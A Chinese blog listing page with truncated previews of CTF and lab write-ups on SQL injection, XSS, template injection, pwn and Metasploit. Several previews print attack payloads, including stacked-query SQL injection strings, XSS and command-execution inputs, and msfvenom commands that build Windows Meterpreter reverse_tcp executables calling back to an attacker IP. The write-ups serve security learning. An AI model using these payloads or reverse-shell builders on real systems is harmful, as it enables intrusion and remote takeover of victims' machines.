- 2024-11-11bp靶场之xss
靶场链接https://portswigger.net/web-security/all-labsxss备忘录:https://portswigger.net/web-security/cross-site-scripting/cheat-sheet将XSS反射到HTML上下文中,无需任何编码搜索123后,url上出现123,页面也直接回显123,说明可能有反射xsshttps://0a1a0050044ea608c471
- 2024-11-10[GYCTF2020]Blacklist
题目链接:[GYCTF2020]Blacklist。打开环境后如下所示。尝试输入1,回显如下。输入'后发现存在报错。尝试使用联合注入,发现存在检测select等关键词。因此尝试下堆叠注入。首先是查询数据库。Payload:0'%3bshow+databases%3b%23。其次是查询当前数据库存在什么表。Pa
- 2024-11-09CTF-WEB: python模板注入
漏洞是如何产生的?Python模板注入漏洞通常出现在使用模板引擎生成动态内容的应用中。如果用户输入没有经过适当的处理直接插入模板中,就可能会导致模板注入漏洞。一个常见的例子是使用Jinja2模板引擎时,如果直接渲染用户输入,则可能导致代码执行等严重后果。以下是一个演示如
- 2024-11-04xss-labs题解
xss—labsxss—labslevel1(GET型)level2(闭合)level3(htmlspecialchars绕过)level4(左右尖括号过滤)level5(a标签法)level6(大小写绕过)level7(双写绕过)level8(利用href自动Unicode解码特性)level9(注释绕过后端判断)xss—labs题目链接BUUCTF在线评测题目源码xss-lab/lev
- 2024-11-02[极客大挑战 2019]BabySQL
题目链接:https://buuoj.cn/challenges#[极客大挑战2019]BabySQL打开环境后如下所示。尝试以下几种方法的万能密码:不加单引号。加单引号。加双引号。发现加入了单引号后,有SQL错误提示,但是可以发现,题目似乎过滤了用户输入的"or"。接下来,尝试双写绕过。发现可以成
- 2024-11-02[强网杯 2019]随便注
题目链接:https://buuoj.cn/challenges#[强网杯2019]随便注打开环境后,如下所示。通过输入',确认该处是由单引号闭合。通过输入Payload:'unionselect1;#,可以发现后端对一些关键词进行了过滤。尝试堆叠注入,可以查询到数据库名以及当前使用的数据库中存在的表名。Payload:'%
- 2024-11-02[极客大挑战 2019]LoveSQL
题目链接:https://buuoj.cn/challenges#[极客大挑战2019]LoveSQL。打开环境后,如下所示。尝试SQL注入(万能密码)。Payload:admin'+or+1%3d1%3b%23。(笔者通过简单粗暴的尝试:①没有使用单引号;②使用单引号;③使用双引号,来确定后端拼接的SQL语句中的password参数系使用单引号
- 2024-11-01sqlmap的tamper详解
sqlmap的tamper详解使用方法:sqlmap.pyXXXXX-tamper"模块名"各个tamper的作用下面针对sqlmap自带的tamper做一下简单的解释。apostrophemask.py:returnpayload.replace(''',"%EF%BC%87")ifpayloadelsepayload将单引号url编码,用于过滤了单引号的情况。1'AND'1&
- 2024-11-01利用Msfvenom对Windows进行远程控制
一、准备工作先在kali安装Apache2,下载代码如下sudoaptinstallapache2 启动Apache2服务serviceapache2start 在kali浏览器中输入你的kaliIP,得到该页面说明启动成功二、开始1.msf远控生成(1)在kali运行msf生成exemsfvenom-pwindows/meterpreter/reverse_t
- 2024-10-31[强网杯 2019]随便注
题目链接:https://buuoj.cn/challenges#[强网杯2019]随便注打开环境后,如下所示。通过输入',确认该处是由单引号闭合。通过输入Payload:'unionselect1;#,可以发现后端对一些关键词进行了过滤。尝试堆叠注入,可以查询到数据库名以及当前使用的数据库中存在的表名。Payload:'%
- 2024-10-31攻防世界5
cgpwn2发现是32位文件打开main函数发现hello双击进入这里我们发现栈溢出了,双击name我们发现了bss发现这题的system有点问题,后门需要我们自己输入,刚好有bss我们直接用它知道system的地址exp:frompwnimport*context(os='linux',arch='i386',log_level='debug')
- 2024-10-30我用这个 AI 工具生成单元测试,简直不要太爽!
本文分享如何使用驭码CodeRider的单元测试功能生成单元测试文件。在之前的文章如何用Python手撸一个GitLab代码安全审查工具?中,我用Python写了一个接受极狐GitLab代码安全审计事件流并且将消息推送到钉钉群的脚本,完整的python代码为:fromfastapiimportFastAPI
- 2024-10-29Meterpreter生成被控端并进行远程控制
Meterpreter生成被控端并进行远程控制Meterpreter简介Meterpreter是kali中自带的用于渗透测试和漏洞利用的工具,它的本质上是一种payload,允许使用者使用命令行执行命令的生成及执行生成木马msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=本机的iplport=5000-fexe
- 2024-10-29BUUCTF pwn学习日记
我是纯新手,零基础的开始学Pwn喽时间:2024年10月29日BUUCTFPwn学习日记1.test_your_nc下载附件,用IDA打开发现直接nc就可以获得flagcatflag得到flag{07c0b69c-dcbf-4991-8cc6-05660b1a2dd2}2.ripIDA打开发现没有看见有用信息,Shift+F12发现了/bin/sh初步怀疑是栈溢
- 2024-10-26Metasploit被控端与主控端的使用
Metasploit被控端与主控端的使用确认IP地址首先我们先查看一下攻击机和靶机的ip地址攻击机ip:192.168.126.129靶机IP:125.217.53.83ps:后面电脑重启了,ip不一定对的上生成被控端我们先使用输入msfvenom命令生成一个payload,这是以下参数的解释:-p:使用反向远程控制程序“wind
- 2024-10-26xss-labs靶场第十三关测试报告
目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、注入点寻找2、使用hackbar进行payload测试3、抓包进行payload测试4、绕过结果四、源代码分析五、结论一、测试环境1、系统环境渗透机:本机(127.0.0.1)靶 机:本机(127.0.0.1)2、使用工
- 2024-10-26xss-labs靶场第十二关测试报告
目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、注入点寻找2、使用hackbar进行payload测试3、绕过结果四、源代码分析五、结论一、测试环境1、系统环境渗透机:本机(127.0.0.1)靶 机:本机(127.0.0.1)2、使用工具/软件火狐浏览器的hac
- 2024-10-26ctfshow web入门命令执行——web29-40题解
web291.传入c参数来进行代码执行,payload: c=system("catfla*.php"); 如图2.浏览器默认不显示php的标签所以需要右键查看源代码web30题目过滤了命令执行函数system,还可以用passthur(),过滤的字符可以用?代替单个字符。payload:?c=passthur("catfla?.p?p");查看源
- 2024-10-25栈迁移原理及简单应用
栈迁移stackoverflow这个漏洞根据是栈溢出的一个延申,一般进行栈溢出攻击时,会把要返回的地址(有用的地址)溢出到ret处,然后就能控制流程甚至时getshell,但是有时候我们溢出的空间不够,够不到ret(或者栈空间不够存储参数)栈迁移的核心思想就是将栈上的ebp和esp迁移到一个输入不受长度的
- 2024-10-25利用msfvenom远程控制
(NAT模式)在kali上先ifconfig得到kali的ip地址192.168.75.133构建`msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.75.133lport=5000-fexe-o/root/payload.exe先转到/root然后把这个文件放在apache的网站下cd/root`cppayload.exe/var/www/html启动apa
- 2024-10-24shctf[Week3] 小小cms
看到首页面了解到YzmCMS的版本,上网搜搜这个版本存在的漏洞发现存在任意函数调用RCE的漏洞https://blog.csdn.net/shelter1234567/article/details/138524342根据文章直接抄payload,进入/pay/index/pay_callback目录下下面cat/flag即可,最终的payload为out_trade_no[0]=eq&o
- 2024-10-23pwntool
基本使用首先需要frompwnimport*把pwntools导入进来,它同时会把一些系统库给导入进来本地打的话p=process('./filename'),远程的话p=remote('192.168.1.103',10001)p.close()关闭发送payloadp.send(payload)发送payloadp.sendline(payload)发送payload,并进行
- 2024-10-21JWT 笔记
总结由header、payload、signature三部分构成,并由英文句号拼接一起payload中存储了部分数据,可减少后端数据库查询header和payload只是用base64编码,并未加密,payload有敏感数据要手动加密jwt在过期时间到之前没法撤销,想要即时登出用户,可以采用类似oauth2.0协议中的做法:认证后
- 2024-10-18XSSLab保姆级教程
XSS(Cross-SiteScripting)即为跨站脚本攻击。XSS-Lab是一个XSS的练习平台。可以在BUUOJ上很方便的进行练习。以下是我在做XSS-Lab的时候总结的题解和一些思路,给想要刷题的同学提供一些参考。1.通用payload<script>alert(1)</script>可以直接加入新标签level1闭合原有标签后